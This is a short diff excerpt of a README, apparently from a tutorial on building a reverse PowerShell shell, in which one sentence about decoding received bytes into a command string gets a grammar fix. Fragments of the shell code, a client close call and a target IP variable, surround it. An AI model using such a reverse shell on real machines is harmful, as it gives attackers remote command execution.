buzzer-re/mresearch/Windows/reverse_powershell/README.md

 $client.Close();
 ```

-Note that we have ***Write-Host*** here, we print the first value of our buff, this value will be the first byte itself we sent, but for execute something in our system we need that the command be in plain text, so we need decode this value into a char, or better, decode a range of bytes in our buffer into a string, for this type of decoding we will use the [.Net Text Namespace](https://docs.microsoft.com/en-us/dotnet/api/system.text.asciiencoding?view=netcore-3.1).
+Note that we have ***Write-Host*** here, we print the first value of our buff, this value will be the first byte itself we sent, but to execute something in our system we need that the command be in plain text, so we need decode this value into a char, or better, decode a range of bytes in our buffer into a string, for this type of decoding we will use the [.Net Text Namespace](https://docs.microsoft.com/en-us/dotnet/api/system.text.asciiencoding?view=netcore-3.1).

 ```powershell
 $target="172.16.110.129"